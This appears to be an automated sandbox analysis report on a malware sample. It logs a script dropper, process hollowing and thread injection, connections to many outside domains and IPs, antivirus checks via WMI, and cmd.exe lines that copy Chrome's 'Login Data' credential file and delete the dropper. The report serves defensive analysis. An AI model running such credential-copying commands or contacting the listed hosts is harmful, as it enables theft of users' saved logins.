Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0001A140 LdrLoadDll, 3_2_0001A140

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: bin.exe.0.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.ratebill.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.muddybootslife.com
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.171 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.localbloom.online
Source: C:\Windows\explorer.exe Domain query: www.pdwfifi.com
Source: C:\Windows\explorer.exe Domain query: www.rasheedabossmoves.com
Source: C:\Windows\explorer.exe Network Connect: 23.231.99.207 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.68chengxinle.com
Source: C:\Windows\explorer.exe Domain query: www.84866.xyz
Source: C:\Windows\explorer.exe Domain query: www.halecamilla.site
Source: C:\Windows\explorer.exe Network Connect: 137.220.133.198 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.39.111.146 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.241.47.216 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 170.39.76.27 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.medyumgalip.com
Source: C:\Windows\explorer.exe Domain query: www.wps-mtb.com
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Domain query: www.refreshertowels.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 207.174.214.35 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.235.200.145 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.jlbwaterdamagerepairseattle.com
Source: C:\Windows\explorer.exe Domain query: www.sekolahkejepang.com
Source: C:\Windows\explorer.exe Network Connect: 52.17.85.125 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.brawlhallacodestore.com
Source: C:\Windows\explorer.exe Domain query: www.hengyuejiguang.com
Source: C:\Windows\explorer.exe Network Connect: 185.134.245.113 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.247.11.212 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.140.71 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: F00000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread register set: target process: 684 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 684 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\wtheeNaAZG.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: explorer.exe, 00000004.00000000.498270430.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.615050632.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.488652696.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.614262773.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.615050632.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.524457764.0000000000E38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.615050632.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.488652696.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.525211919.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: YProgram Managerf
Source: explorer.exe, 00000004.00000000.615050632.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.488652696.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.525211919.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
